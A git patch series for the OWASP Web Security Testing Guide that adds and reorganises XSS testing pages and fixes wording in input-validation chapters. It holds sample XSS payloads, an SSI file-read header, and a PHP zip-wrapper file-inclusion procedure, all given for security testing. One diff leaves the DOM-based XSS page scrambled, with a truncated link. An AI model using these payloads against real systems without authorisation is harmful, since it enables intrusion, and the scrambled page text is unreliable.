index 1f7e2cc84d..4b52c61732 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-20|
+|WSTG-INPV-19|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
new file mode 100644
index 0000000000..3a3979c2c1
--- /dev/null
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
@@ -0,0 +1,109 @@
+# Testing for Cross Site Scripting
+
+|ID          |
+|------------|
+|WSTG-CLNT-01|
+
+## Summary
+
+Cross-Site Scripting (XSS) testing checks if it is possible to inject malicious scripts into a web application, which are then executed by users' browsers. XSS vulnerabilities occur when user-supplied input is not properly validated or sanitized before being included in the application's output. Successful exploitation of an XSS vulnerability allows attackers to execute arbitrary JavaScript code within the context of a victim's browser, leading to various attacks such as session hijacking, defacement, or stealing sensitive information.
+
+XSS attacks can be classified into the following three types:
+
+Stored XSS: The malicious script is permanently stored on the target server and is served to users when they access a particular page or view specific content.
+
+Reflected XSS: The malicious script is embedded in a URL and is reflected back to the user by the web application, typically as part of an error message or search result.
+
+DOM-based XSS: The vulnerability arises from insecure handling of client-side JavaScript in the Document Object Model (DOM) of a web page. The malicious script is directly executed by the victim's browser.
+
+An XSS attack occurs when an attacker can inject untrusted data into a web application, which is then included in a response that is sent to other users. This untrusted data can be included in various contexts within an HTML document, including:
+
+HTML tags: If user-supplied input is inserted without proper encoding into HTML tags, it can lead to script execution. For example:
+```js
+<script>alert('XSS');</script>
+```
+HTML attributes: If user-supplied input is included in HTML attributes without proper encoding, it can be exploited to execute scripts. For example:
+
+```js
+<img src="x" onerror="alert('XSS')">
+```
+JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example, 
+
+```js
+var userInput = '<%= userInput %>';
+
+```
+
+URLs: If user-supplied input is included in URLs without proper encoding, it can result in script execution. For example,
+
+```js
+https://example.com/search?q=<script>alert('XSS');</script>
+```
+
+XSS vulnerabilities can have severe consequences, ranging from stealing sensitive user information to performing actions on behalf of the user, such as modifying account settings or making unauthorized transactions.
+
+## Test Objectives
+
+Identify input fields or parameters vulnerable to XSS attacks.
+Assess the impact and severity of XSS vulnerabilities.
+Validate the effectiveness of input validation and output encoding mechanisms in preventing XSS attacks.
+
+## How to Test
+
+### Detection Techniques
+
+The first step in XSS testing is to identify all user-supplied input fields or parameters within the web application. This includes input fields in web forms, query string parameters in URLs, hidden form fields, cookies, headers, and any other input sources that are used to generate dynamic content.
+
+Once the input fields or parameters are identified, the following techniques can be employed to detect XSS vulnerabilities:
+
+HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: 
+```js
+<script>alert('XSS');</script>
+```
+
+If the injected HTML tags are not properly sanitized, they will be interpreted and executed by the browser.
+
+Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: 
+
+```js
+"><img src=x onerror=alert('XSS')>
+```
+
+If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution.
+
+JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within `<script>` tags, inline event handlers, or within JavaScript variables. For example: 
+```js
+');alert('XSS');//
+````
+
+If the injected JavaScript code is not properly escaped or validated, it will be executed by the browser.
+
+URL Injection: Inject script payloads into URLs and check if they are executed. For example: 
+
+```js
+https://example.com/search?q=<script>alert('XSS');</script>
+```
+
+If the injected script is not properly encoded, it will be interpreted as part of the URL and executed by the browser.
+
+Context-Specific Injection: Test for XSS vulnerabilities in specific contexts such as input fields used in search functionality, comment sections, messaging systems, or any other areas where user-supplied input is displayed to other users.
+
+During testing, it is important to observe the behavior of the application and analyze the responses received. Look for any unexpected execution of scripts or the presence of injected content within the rendered HTML source code. Additionally, monitor the network traffic to identify any requests or responses that contain suspicious or unexpected content.
+
+It is recommended to test various browsers to ensure cross-browser compatibility of the identified XSS vulnerabilities.
+
+## Remediation
+
+To mitigate XSS vulnerabilities, the following best practices should be implemented:
+
+Input Validation: Perform strict input validation on all user-supplied input. Accept only the expected characters and reject or sanitize any input that contains special characters or script-like content.
+
+Output Encoding: Encode all user-supplied input that is rendered within HTML, JavaScript, or URL contexts. Use proper encoding mechanisms specific to the context, such as HTML entity encoding, JavaScript escaping, or URL encoding.
+
+Content Security Policy (CSP): Implement a strong CSP to restrict the execution of scripts from external sources and enforce a whitelist of trusted sources for content.
+
+HTTP Only Cookies: Set the "HttpOnly" flag for session cookies to prevent access from client-side scripts, reducing the risk of session theft via XSS.
+
+X-XSS-Protection Header: Enable the X-XSS-Protection header with the "1; mode=block" directive to instruct browsers to block or sanitize detected XSS attacks.
+
+Contextual Output Encoding: Apply output encoding based on the context in which the user-supplied input is rendered. Different encoding mechanisms may be required for HTML, JavaScript, or URL contexts.
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
index 7927eb06d9..4b2da3a0c2 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
@@ -1,9 +1,5 @@
 # Testing for Reflected Cross Site Scripting
 
-|ID          |
-|------------|
-|WSTG-INPV-01|
-
 ## Summary
 
 Reflected [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
index b7f9de9543..0af255b50c 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
@@ -1,9 +1,5 @@
 # Testing for Stored Cross Site Scripting
 
-|ID          |
-|------------|
-|WSTG-INPV-02|
-
 ## Summary
 
 Stored [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.
diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
similarity index 97%
rename from document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
index ce9dffc197..b0eed18c1b 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
@@ -1,8 +1,10 @@
-# Testing for DOM-Based Cross Site Scripting
+cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).
+
+## References
 
-|ID          |
-|------------|
-|WSTG-CLNT-01|
+- [DomXSSWiki](https://github.com/wisec/domxsswiki/wiki/)
+- [DOM XSS article by Amit Klein](http://www.webappsec.org/projects/articles/071105.html)
+# Testing for DOM-Based Cross Site Scripting
 
 ## Summary
 
@@ -91,9 +93,4 @@ Manual testing should therefore be undertaken and can be done by examining areas
 
 ## Remediation
 
-For measures to prevent DOM-based XSS, see the [DOM-based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).
-
-## References
-
-- [DomXSSWiki](https://github.com/wisec/domxsswiki/wiki/)
-- [DOM XSS article by Amit Klein](http://www.webappsec.org/projects/articles/071105.html)
+For measures to prevent DOM-based XSS, see the [DOM-based XSS Prevention Cheat Sheet](https://
\ No newline at end of file
diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Alert.png b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Alert.png
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Alert.png
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Alert.png
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Stored_input_example.jpg b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Stored_input_example.jpg
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Stored_input_example.jpg
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Stored_input_example.jpg
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Stored_xss_example.jpg b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Stored_xss_example.jpg
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Stored_xss_example.jpg
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Stored_xss_example.jpg
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/XSS_Example1.png b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/XSS_Example1.png
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/XSS_Example1.png
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/XSS_Example1.png
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/XSS_Example2.png b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/XSS_Example2.png
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/XSS_Example2.png
rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/XSS_Example2.png

From 3188789390f8971bb1454a65703e9d2bcadf0da7 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:17:54 +0530
Subject: [PATCH 03/37] mistakes fixed

---
 .../01-Testing_for_Cross_Site_Scripting.md                      | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
index 3a3979c2c1..1e4229772c 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
@@ -100,7 +100,7 @@ Input Validation: Perform strict input validation on all user-supplied input. Ac
 
 Output Encoding: Encode all user-supplied input that is rendered within HTML, JavaScript, or URL contexts. Use proper encoding mechanisms specific to the context, such as HTML entity encoding, JavaScript escaping, or URL encoding.
 
-Content Security Policy (CSP): Implement a strong CSP to restrict the execution of scripts from external sources and enforce a whitelist of trusted sources for content.
+Content Security Policy (CSP): Implement a strong CSP to restrict the execution of scripts from external sources and enforce a allow list(s) of trusted sources for content.
 
 HTTP Only Cookies: Set the "HttpOnly" flag for session cookies to prevent access from client-side scripts, reducing the risk of session theft via XSS.
 

From 83043812ace21352d8a44dac3111e677cdcd3642 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:44:02 +0530
Subject: [PATCH 04/37] mistake fixed for
 07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution (#591)

---
 .../02-Testing_for_HTTP_Parameter_Pollution.md                | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md
index 64b6a048e3..921a8c6c56 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md
@@ -20,7 +20,7 @@ In 2009, immediately after the publication of the first research on HTTP Paramet
 
 One of these flaws, affecting *ModSecurity SQL Injection Core Rules*, represents a perfect example of the impedance mismatch between applications and filters. The ModSecurity filter would correctly apply a deny list for the following string: `select 1,2,3 from table`, thus blocking this example URL from being processed by the web server: `/index.aspx?page=select 1,2,3 from table`. However, by exploiting the concatenation of multiple HTTP parameters, an attacker could cause the application server to concatenate the string after the ModSecurity filter already accepted the input. As an example, the URL `/index.aspx?page=select 1&page=2,3` from table would not trigger the ModSecurity filter, yet the application layer would concatenate the input back into the full malicious string.
 
-Another HPP vulnerability turned out to affect *Apple Cups*, the well-known printing system used by many UNIX systems. Exploiting HPP, an attacker could easily trigger a Cross-Site Scripting vulnerability using the following URL: `http://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos`. The application validation checkpoint could be bypassed by adding an extra `kerberos` argument having a valid string (e.g. empty string). As the validation checkpoint would only consider the second occurrence, the first `kerberos` parameter was not properly sanitized before being used to generate dynamic HTML content. Successful exploitation would result in JavaScript code execution under the context of the hosting web site.
+Another HPP vulnerability turned out to affect *Apple Cups*, the well-known printing system used by many UNIX systems. Exploiting HPP, an attacker could easily trigger a Cross-Site Scripting vulnerability using the following URL: `http://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos`. The application validation checkpoint could be bypassed by adding an extra `kerberos` argument having a valid string (e.g. empty string). As the validation checkpoint would only consider the second occurrence, the first `kerberos` parameter was not properly sanitized before being used to generate dynamic HTML content. Successful exploitation would result in JavaScript code execution under the context of the hosting site.
 
 ### Authentication Bypass
 
@@ -54,7 +54,7 @@ Given the URL and querystring: `http://example.com/?color=red&color=blue`
   | JSP, Servlet / Jetty  | First occurrence only | color=red |
   | IBM Lotus Domino | Last occurrence only | color=blue |
   | IBM HTTP Server | First occurrence only | color=red |
-  | node.js / express | First occurrence only | color=red |
+  | Node.js / express | First occurrence only | color=red |
   | mod_perl, libapreq2 / Apache | First occurrence only | color=red |
   | Perl CGI / Apache | First occurrence only | color=red |
   | mod_wsgi (Python) / Apache | First occurrence only | color=red |

From c5277d45c88e4d861378d49275676a7566801601 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:44:55 +0530
Subject: [PATCH 05/37] mistake fixed for
 07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution (#591)

---
 .../07-Input_Validation_Testing/03.1-Testing_for_Oracle.md      | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md
index 5e256dc85d..029558767a 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md
@@ -106,7 +106,7 @@ On older versions of the PL/SQL Gateway, it is possible to directly access the p
 
 `http://www.example.com/pls/dad/owa_util.signature`
 
-returns the following output on the webpage
+returns the following output on the web page
 
 `"This page was produced by the PL/SQL Web Toolkit on date"`
 

From b96069f1d7ac0484d83c6057c93bae4c530c2645 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:47:17 +0530
Subject: [PATCH 06/37] Mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL
 (#591)

---
 .../07-Input_Validation_Testing/03.2-Testing_for_MySQL.md       | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
index 65565d80fe..a17e08bfda 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
@@ -60,7 +60,7 @@ For example the following injection will result in an error:
 
 #### Fingerprinting MySQL
 
-Of course, the first thing to know is if there's MySQL DBMS as a back end database. MySQL server has a feature that is used to let other DBMS ignore a clause in MySQL dialect. When a comment block `'/**/'` contains an exclamation mark `'/*! sql here*/'` it is interpreted by MySQL, and is considered as a normal comment block by other DBMS as explained in [MySQL manual](https://dev.mysql.com/doc/refman/8.0/en/comments.html).
+Of course, the first thing to know is if there's MySQL DBMS as a backend database. MySQL server has a feature that is used to let other DBMS ignore a clause in MySQL dialect. When a comment block `'/**/'` contains an exclamation mark `'/*! sql here*/'` it is interpreted by MySQL, and is considered as a normal comment block by other DBMS as explained in [MySQL manual](https://dev.mysql.com/doc/refman/8.0/en/comments.html).
 
 Example:
 

From 4e19ca5bbf4600b434607f5c1f327b43bf5c5c45 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:49:34 +0530
Subject: [PATCH 07/37] Mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection
 (#591)

---
 .../06-Testing_for_SSI_Injection.md                           | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
index 18770d07bf..35807b6b87 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
@@ -72,8 +72,8 @@ User-Agent: <!--#include virtual="/proc/version"-->
 
 - [Nginx SSI module](http://nginx.org/en/docs/http/ngx_http_ssi_module.html)
 - [Apache: Module mod_include](https://httpd.apache.org/docs/current/mod/mod_include.html)
-- [IIS: Server Side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29)
-- [Apache Tutorial: Introduction to Server Side Includes](https://httpd.apache.org/docs/current/howto/ssi.html)
+- [IIS: Server-side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29)
+- [Apache Tutorial: Introduction to Server-side Includes](https://httpd.apache.org/docs/current/howto/ssi.html)
 - [Apache: Security Tips for Server Configuration](https://httpd.apache.org/docs/current/misc/security_tips.html#ssi)
 - [SSI Injection instead of JavaScript Malware](https://jeremiahgrossman.blogspot.com/2006/08/ssi-injection-instead-of-javascript.html)
 - [IIS: Notes on Server-Side Includes (SSI) syntax](https://blogs.iis.net/robert_mcmurray/archive/2010/12/28/iis-notes-on-server-side-includes-ssi-syntax-kb-203064-revisited.aspx)

From 6de5b1f4ed1d567a8da209c71bb74e35c48c0fdb Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:50:16 +0530
Subject: [PATCH 08/37] Mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection
 (#591)

---
 .../06-Testing_for_SSI_Injection.md                           | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
index 35807b6b87..94a43c8fa5 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
@@ -72,8 +72,8 @@ User-Agent: <!--#include virtual="/proc/version"-->
 
 - [Nginx SSI module](http://nginx.org/en/docs/http/ngx_http_ssi_module.html)
 - [Apache: Module mod_include](https://httpd.apache.org/docs/current/mod/mod_include.html)
-- [IIS: Server-side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29)
-- [Apache Tutorial: Introduction to Server-side Includes](https://httpd.apache.org/docs/current/howto/ssi.html)
+- [IIS: server-side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29)
+- [Apache Tutorial: Introduction to server-side Includes](https://httpd.apache.org/docs/current/howto/ssi.html)
 - [Apache: Security Tips for Server Configuration](https://httpd.apache.org/docs/current/misc/security_tips.html#ssi)
 - [SSI Injection instead of JavaScript Malware](https://jeremiahgrossman.blogspot.com/2006/08/ssi-injection-instead-of-javascript.html)
 - [IIS: Notes on Server-Side Includes (SSI) syntax](https://blogs.iis.net/robert_mcmurray/archive/2010/12/28/iis-notes-on-server-side-includes-ssi-syntax-kb-203064-revisited.aspx)

From abd0d14d1abdebcd18d30695f19fa59b900ca2a0 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:52:39 +0530
Subject: [PATCH 09/37] mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection
 (#591)

---
 .../08-Testing_for_IMAP_SMTP_Injection.md                 | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md
index 6b856ced34..2879946f88 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md
@@ -8,14 +8,14 @@
 
 This threat affects all applications that communicate with mail servers (IMAP/SMTP), generally webmail applications. The aim of this test is to verify the capacity to inject arbitrary IMAP/SMTP commands into the mail servers, due to input data not being properly sanitized.
 
-The IMAP/SMTP Injection technique is more effective if the mail server is not directly accessible from Internet. Where full communication with the backend mail server is possible, it is recommended to conduct direct testing.
+The IMAP/SMTP Injection technique is more effective if the mail server is not directly accessible from internet. Where full communication with the backend mail server is possible, it is recommended to conduct direct testing.
 
-An IMAP/SMTP Injection makes it possible to access a mail server which otherwise would not be directly accessible from the Internet. In some cases, these internal systems do not have the same level of infrastructure security and hardening that is applied to the front-end web servers. Therefore, mail server results may be more vulnerable to attacks by end users (see the scheme presented in Figure 1).
+An IMAP/SMTP Injection makes it possible to access a mail server which otherwise would not be directly accessible from the internet. In some cases, these internal systems do not have the same level of infrastructure security and hardening that is applied to the frontend web servers. Therefore, mail server results may be more vulnerable to attacks by end users (see the scheme presented in Figure 1).
 
 ![IMAP SMTP Injection](images/Imap-smtp-injection.png)\
 *Figure 4.7.10-1: Communication with the mail servers using the IMAP/SMTP Injection technique*
 
-Figure 1 depicts the flow of traffic generally seen when using webmail technologies. Step 1 and 2 is the user interacting with the webmail client, whereas step 2 is the tester bypassing the webmail client and interacting with the back-end mail servers directly.
+Figure 1 depicts the flow of traffic generally seen when using webmail technologies. Step 1 and 2 is the user interacting with the webmail client, whereas step 2 is the tester bypassing the webmail client and interacting with the backend mail servers directly.
 
 This technique allows a wide variety of actions and attacks. The possibilities depend on the type and scope of injection and the mail server technology being tested.
 
@@ -37,7 +37,7 @@ Some examples of attacks using the IMAP/SMTP Injection technique are:
 
 ### Identifying Vulnerable Parameters
 
-In order to detect vulnerable parameters, the tester has to analyze the application's ability in handling input. Input validation testing requires the tester to send bogus, or malicious, requests to the server and analyse the response. In a secure application, the response should be an error with some corresponding action telling the client that something has gone wrong. In a vulnerable application, the malicious request may be processed by the back-end application that will answer with a `HTTP 200 OK` response message.
+In order to detect vulnerable parameters, the tester has to analyze the application's ability in handling input. Input validation testing requires the tester to send bogus, or malicious, requests to the server and analyse the response. In a secure application, the response should be an error with some corresponding action telling the client that something has gone wrong. In a vulnerable application, the malicious request may be processed by the backend application that will answer with a `HTTP 200 OK` response message.
 
 It is important to note that the requests being sent should match the technology being tested. Sending SQL injection strings for Microsoft SQL server when a MySQL server is being used will result in false positive responses. In this case, sending malicious IMAP commands is modus operandi since IMAP is the underlying protocol being tested.
 

From 13af5164c3593f07a6892906ae85c7008821a909 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:54:53 +0530
Subject: [PATCH 10/37] mistake fixed
 4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion
 (#591)

---
 .../09.1-Testing_for_File_Inclusion.md                    | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md
index cfe6bc886d..a882c9fb64 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md
@@ -85,22 +85,22 @@ The wrapper can be used like `php://filter/convert.base64-encode/resource=FILE`
 
 In PHP 7.2.0, the `zip://` wrapper was introduced to manipulate `zip` compressed files. This wrapper expects the following parameter structure: `zip:///filename_path#internal_filename`. The `filename_path` is the path to the malicious zip archive and `internal_filename` is the path of the malicious file placed inside the processed ZIP file. During the exploitation, it's common that the `#` would be encoded with its URL encoded value `%23`.
 
-Abuse of this wrapper could allow an attacker to design a malicious ZIP file that could be uploaded to the server, for example as an avatar image or using any file upload system available on the target website (the `php:zip://` wrapper does not require the zip file to have any specific extension) to be executed by the LFI vulnerability.
+Abuse of this wrapper could allow an attacker to design a malicious ZIP file that could be uploaded to the server, for example as an avatar image or using any file upload system available on the target site (the `php:zip://` wrapper does not require the zip file to have any specific extension) to be executed by the LFI vulnerability.
 
 In order to test this vulnerability, the following procedure could be followed to attack the previous code example provided.
 
 1. Create the PHP file to be executed, for example with the content `<?php phpinfo(); ?>` and save it as `code.php`.
 2. Compress it as a new ZIP file called `target.zip`.
-3. Rename the `target.zip` file to `target.jpg` to bypass the extension validation and upload it to the target website as your avatar image.
+3. Rename the `target.zip` file to `target.jpg` to bypass the extension validation and upload it to the target site as your avatar image.
 4. Supposing that the `target.jpg` file is stored locally on the server to the `../avatar/target.jpg` path, exploit the vulnerability with the PHP ZIP wrapper by injecting the following payload to the vulnerable URL: `zip://../avatar/target.jpg%23code` (remember that `%23` corresponds to `#`).
 
 Since on our sample the `.php` extension is concatenated to our payload, the request to `http://vulnerable_host/preview.php?file=zip://../avatar/target.jpg%23code` will result in the execution of the `code.php` file existing in the malicious ZIP file.
 
 ##### PHP Data
 
-Available since PHP 5.2.0, this wrapper expects the following usage: `data://text/plain;base64,BASE64_STR` where `BASE64_STR` is expected to be the Base64 encoded content of the file to be processed. It's important to consider that this wrapper would only be available if the option `allow_url_include` would be enabled.
+Available since PHP 5.2.0, this wrapper expects the following usage: `data://text/plain;base64,BASE64_STR` where `BASE64_STR` is expected to be the base64 encoded content of the file to be processed. It's important to consider that this wrapper would only be available if the option `allow_url_include` would be enabled.
 
